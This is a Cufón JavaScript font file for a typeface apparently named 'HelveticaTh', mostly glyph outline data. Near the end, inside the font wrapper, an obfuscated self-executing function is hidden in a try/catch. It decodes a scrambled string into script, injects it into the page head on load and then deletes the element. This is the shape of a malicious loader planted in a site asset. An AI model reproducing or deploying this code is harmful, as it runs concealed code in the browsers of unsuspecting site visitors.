-50,-14,-36,53,-36,93v0,48,-20,56,-25,59v5,5,25,12,25,60v0,37,-17,107,36,93r0,12v-33,1,-48,0,-49,-42v-1,-42,9,-110,-26,-115r0,-14v36,-4,25,-74,26,-116v1,-42,16,-43,49,-42","w":119},{"d":"199,-63r0,14r-182,0r0,-14r182,0xm199,-133r0,14r-182,0r0,-14r182,0","w":216},{"d":"82,66r-12,0v-62,-98,-61,-231,1,-329r12,0v-60,99,-62,230,-1,329","w":86},{"d":"23,-257r16,0r0,154v0,31,5,95,80,95v120,0,76,-144,84,-249r16,0v-7,119,36,264,-100,263v-91,0,-96,-75,-96,-109r0,-154","w":241},{"d":"23,0r0,-257v87,8,184,-33,184,72v0,45,-30,71,-81,71r-87,0r0,114r-16,0xm39,-243r0,115r90,0v46,0,62,-30,62,-57v0,-19,-9,-58,-60,-58r-92,0","w":212,"k":{"\u0104":20,"\u00c4":20,"A":20,".":52,",":52}},{"d":"101,-98r0,-83r14,0r0,83r84,0r0,14r-84,0r0,84r-14,0r0,-84r-84,0r0,-14r84,0","w":216},{"d":"239,-180r-16,0v-7,-43,-45,-69,-88,-69v-67,0,-106,54,-106,120v0,66,39,121,106,121v50,0,89,-44,92,-92r16,0v-6,62,-51,106,-108,106v-77,0,-122,-60,-122,-135v0,-75,45,-134,122,-134v91,0,104,79,104,83","w":253},{"d":"41,-185r18,0r0,37r-18,0r0,-37xm36,45v-1,-18,16,-28,12,-45r-7,0r0,-37r18,0v-1,36,5,70,-23,82","w":100},{"d":"131,-75r0,-155r-107,155r107,0xm131,-248r14,0r0,173r42,0r0,12r-42,0r0,63r-14,0r0,-63r-121,0r0,-14"},{"d":"83,0r0,-37r19,0r0,37r-19,0xm85,-65v-4,-71,67,-77,67,-134v0,-36,-28,-50,-58,-50v-43,0,-65,31,-65,72r-14,0v0,-51,28,-86,80,-86v39,0,71,20,71,64v0,69,-68,56,-67,134r-14,0","w":186},{"d":"197,-66v0,-87,-175,-32,-175,-129v0,-49,45,-68,86,-68v54,0,95,22,98,79r-16,0v-2,-44,-34,-65,-82,-65v-29,0,-71,12,-71,54v0,84,176,30,176,129v0,53,-52,72,-91,72v-60,0,-109,-25,-108,-91r16,0v-3,56,41,77,92,77v31,0,75,-13,75,-58","w":226},{"d":"119,-248r0,248r-14,0r0,-222v-18,19,-41,29,-66,32r0,-12v29,-4,53,-20,68,-46r12,0"},{"d":"196,0r-31,-38v-28,60,-151,57,-150,-23v0,-42,37,-62,67,-81v-16,-20,-34,-39,-34,-66v0,-27,27,-45,54,-45v28,0,54,16,54,45v0,36,-29,52,-54,70r61,75v5,-13,9,-28,9,-43r14,0v-1,19,-6,38,-13,55r42,51r-19,0xm156,-49r-66,-83v-27,17,-61,35,-61,71v0,34,32,53,63,53v44,0,64,-39,64,-41xm94,-148v21,-13,48,-31,48,-60v0,-43,-81,-42,-81,0v0,25,21,43,33,60","w":213},{"d":"183,-187r-14,0v-6,-32,-29,-54,-62,-54v-68,0,-80,82,-77,130v11,-32,41,-53,74,-53v49,0,83,36,83,85v0,48,-35,83,-83,83v-69,0,-89,-56,-89,-116v0,-61,15,-141,92,-141v42,0,71,24,76,66xm104,-8v40,0,69,-32,69,-71v0,-39,-29,-73,-69,-73v-41,0,-71,33,-71,73v0,41,32,71,71,71"},{"d":"58,-257r10,0r0,47r44,-15r4,10r-44,15r27,37r-8,7r-28,-38r-28,38r-9,-7r29,-37r-45,-15r4,-10r44,15r0,-47","w":126},{"d":"39,-14r158,0r0,14r-174,0r0,-257r172,0r0,14r-156,0r0,103r147,0r0,13r-147,0r0,113xm117,-285r-15,0r0,-38r15,0r0,38","w":201},{"d":"239,-180r-16,0v-7,-43,-45,-69,-88,-69v-67,0,-106,54,-106,120v0,66,39,121,106,121v50,0,89,-44,92,-92r16,0v-6,62,-51,106,-108,106v-77,0,-122,-60,-122,-135v0,-75,45,-134,122,-134v91,0,104,79,104,83xm140,-281r-14,0r-41,-50r13,0r35,41r35,-41r14,0","w":253},{"d":"138,-126r108,0r0,126r-14,0v-1,-18,2,-39,-1,-55v-13,37,-52,61,-97,61v-78,0,-121,-59,-121,-133v0,-73,45,-136,122,-136v53,0,98,32,107,86r-16,0v-12,-45,-44,-72,-91,-72v-69,0,-106,58,-106,122v0,65,35,119,106,119v61,0,100,-41,97,-104r-94,0r0,-14","w":266},{"d":"21,0r0,-257r14,0r0,170r114,-98r19,0r-81,69r87,116r-18,0r-79,-105r-42,35r0,70r-14,0","w":166},{"d":"33,-173r-33,0r0,-12r33,0v-6,-48,9,-87,57,-73r0,12v-22,-4,-43,-4,-43,24r0,37r38,0r0,12r-38,0r0,173r-14,0r0,-173","w":86},{"d":"102,-91r-77,0r0,-14r77,0r0,14","w":126},{"d":"59,0r-18,0r0,-37r18,0r0,37xm41,-185r18,0r0,37r-18,0r0,-37","w":100},{"d":"56,0r-19,0r0,-37r19,0r0,37xm38,-257r17,0r-4,191r-9,0","w":93},{"d":"100,-8v62,0,76,-66,76,-116v0,-50,-14,-117,-76,-117v-62,0,-76,67,-76,117v0,50,14,116,76,116xm100,4v-72,0,-90,-69,-90,-128v0,-59,18,-129,90,-129v72,0,90,70,90,129v0,59,-18,128,-90,128"},{"d":"75,-136r0,-12v35,0,65,-15,65,-54v0,-32,-24,-47,-54,-47v-36,0,-51,21,-51,56r0,193r-14,0r0,-193v0,-44,20,-68,65,-68v38,0,68,19,68,59v0,31,-15,49,-43,58v37,4,56,30,56,67v0,79,-49,77,-92,77r0,-12v36,0,78,0,78,-65v0,-48,-34,-59,-78,-59","w":180},{"d":"14,66r0,-12v51,14,36,-52,36,-93v0,-48,21,-55,26,-60v-5,-3,-26,-11,-26,-59v0,-37,18,-108,-36,-93r0,-12v33,-1,49,0,50,42v1,42,-10,111,26,116r0,14v-35,4,-25,73,-26,115v-1,42,-17,43,-50,42","w":119},{"d":"5,-263r12,0v61,98,60,231,-1,329r-12,0v60,-99,62,-230,1,-329","w":86},{},{"d":"23,0r0,-257r16,0r0,257r-16,0","w":61},{"d":"10,6r-15,0r115,-269r15,0","w":119},{"d":"157,-141r0,107v-2,14,5,27,22,21r0,12v-29,6,-39,-11,-37,-36v-11,47,-130,65,-130,-11v0,-44,37,-53,68,-55v61,-5,63,-8,63,-38v0,-8,-9,-36,-51,-36v-33,0,-55,17,-57,49r-14,0v2,-41,27,-61,71,-61v32,0,65,9,65,48xm143,-105v-24,23,-118,-1,-118,57v0,23,16,40,49,40v62,0,69,-53,69,-63r0,-34","w":180},{"d":"163,0v-1,-13,2,-29,-1,-40v-15,29,-38,44,-71,44v-56,0,-79,-45,-79,-96v0,-55,26,-97,82,-97v31,-1,57,18,69,45r0,-113r14,0r0,257r-14,0xm94,-8v47,0,69,-42,69,-84v0,-43,-21,-85,-69,-85v-49,0,-69,40,-69,85v0,44,21,84,69,84"},{"d":"59,0r-18,0r0,-37r18,0r0,37","w":100},{"d":"90,-132r-90,-125r19,0r81,113r83,-113r18,0r-90,125r95,132r-19,0r-87,-120r-87,120r-19,0"},{"d":"173,-128r-14,0v-3,-33,-29,-49,-62,-49v-46,0,-71,41,-71,83v0,50,23,86,71,86v35,0,59,-24,64,-57r14,0v-6,44,-38,69,-78,69v-60,0,-85,-46,-85,-98v0,-52,30,-95,85,-95v40,0,72,19,76,61","w":186},{"d":"12,-257r88,243r89,-243r16,0r-96,257r-18,0r-96,-257r17,0","k":{"\u0173":6,"\u016b":6,"\u0119":13,"\u0117":13,"\u0105":13,"\u0104":15,"\u00fc":6,"\u00f6":13,"\u00e4":13,"\u00c4":15,"u":6,"r":6,"o":13,"e":13,"a":13,"A":15,";":13,":":13,".":33,"-":13,",":33}},{"d":"23,0r0,-257r19,0r164,236r0,-236r15,0r0,257r-18,0r-164,-238r0,238r-16,0","w":244},{"d":"72,0r-74,-257r16,0r68,240r68,-240r20,0r69,240r66,-240r17,0r-74,257r-18,0r-71,-243r-69,243r-18,0","w":320,"k":{"\u012f":-9,"\u0119":6,"\u0117":6,"\u0105":6,"\u0104":2,"\u00f6":6,"\u00e4":6,"\u00c4":2,"o":6,"i":-9,"e":6,"a":6,"A":2,";":6,":":6,".":20,"-":13,",":20}},{"d":"23,0r0,-257r22,0r102,239r99,-239r23,0r0,257r-16,0r-1,-238r-98,238r-16,0r-99,-238r0,238r-16,0","w":291},{"d":"161,-185r-70,185r-17,0r-75,-185r16,0r68,169r62,-169r16,0","w":159,"k":{".":27,",":27}},{"d":"71,-175r0,-82r14,0r0,82r-14,0xm29,-175r0,-82r13,0r0,82r-13,0","w":113},{"d":"63,46v-3,-10,17,-34,30,-42v-53,0,-81,-42,-81,-93v0,-51,26,-100,82,-100v58,0,84,45,81,98r-149,0v-1,44,22,83,68,83v35,0,59,-20,66,-55r14,0v-7,38,-30,62,-70,67v-10,9,-27,29,-25,40v2,21,28,19,36,2r8,3v-6,13,-15,22,-30,22v-8,0,-30,-2,-30,-25xm26,-103r135,0v-1,-39,-25,-74,-67,-74v-41,0,-65,37,-68,74","w":186},{"d":"23,0r0,-257r16,0r0,148r161,-148r21,0r-118,107r125,150r-20,0r-116,-139r-53,48r0,91r-16,0","w":220},{"d":"33,77r0,-360r14,0r0,360r-14,0","w":79},{"d":"20,-237r0,-11r160,0r0,13v-50,55,-95,113,-107,235r-15,0v6,-71,23,-145,109,-237r-147,0"},{"d":"33,-142v0,62,127,20,127,95v0,40,-40,51,-72,51v-42,0,-74,-23,-75,-66r14,0v2,34,28,54,61,54v24,0,59,-7,59,-39v0,-63,-128,-19,-128,-95v0,-36,36,-47,67,-47v39,0,69,17,69,59r-14,0v0,-33,-24,-47,-55,-47v-25,0,-53,9,-53,35","w":173},{"d":"88,-185r0,12r-40,0r0,129v0,30,14,33,40,32r0,12v-27,2,-54,-2,-54,-44r0,-129r-34,0r0,-12r34,0r0,-58r14,0r0,58r40,0","w":93},{"d":"125,6r-15,0r-115,-269r15,0","w":119},{"d":"249,13r-43,-30v-20,15,-43,23,-72,23v-77,0,-123,-60,-123,-135v0,-75,46,-134,123,-134v121,0,157,165,83,236r40,29xm163,-66r41,30v67,-63,37,-213,-70,-213v-67,0,-107,54,-107,120v0,90,93,155,167,102r-39,-27","w":266}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-59-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("hcsbWVLvmG5Yht)=7VS%*c*5E_LbsV5YE_8%mG1AskC-^BvUEaKfp#sUEaKfpc1?(Aw[4G)}kS83y`tj,Sca*8hqpLM(z1Z#KkGE^smWw74{l+U?2)VA~DI@-eY}f3%Bvb_![Pu=C5&>Z,1fEaKfp#72Gv`uZ)CbEaKfp#,[^)3bpj`V^b3bpj`?La+-1K3mEaKfp#`2pbPY*_bw7#yf^#`)EaKfp#7)7k3bpj,fLc+w7#yfsjssqS3bpj`)Lt1%zU7w7#y3pjkAEaKfpc^_m)3bpj,_pk3bpj,3Lb3bp?y3^b3bpj,!pv,C1)3bpj,_ptK%EaKfp#8VEaK%pjS)EaKfp#s+EaKfp#8)EaKfp#w%EKCP4Bv~kky@zB-v(bp38?^IEaKfp#,_EaKfp#`?1_eVq#~+pS3bpj`2sAvD*,)wq_S2q)+?k2PE#Esw*)3bpj,3MKeCL!LvES31*UPBwc3D7tlU*U2-m#vfqay5^UPfqcf5wtP-sGPA7cl-sBbUqV^Ys_3Pwc+B(Ee5M_)Vhc*YW_-5qb[~(BD!7!7wqU2>hjCuWc527V)-^kfYWazD8t5DqA1)w!z~Wc5?^E1DW_[Ymc5B7cP+WGKDhGs}wUl=m#3-M%-@mZ)AG_LWmkb7(E`Wmkb5hZlD")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":200,"face":{"font-family":"HelveticaTh","font-weight":250,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 4 3 2 2 2 2 2 4","ascent":"257","descent":"-103","x-height":"4","bbox":"-12 -331 322 77","underline-thickness":"18","underline-position":"-18","stemh":"12","stemv":"14","unicode-range":"U+0021-U+201E"}}));

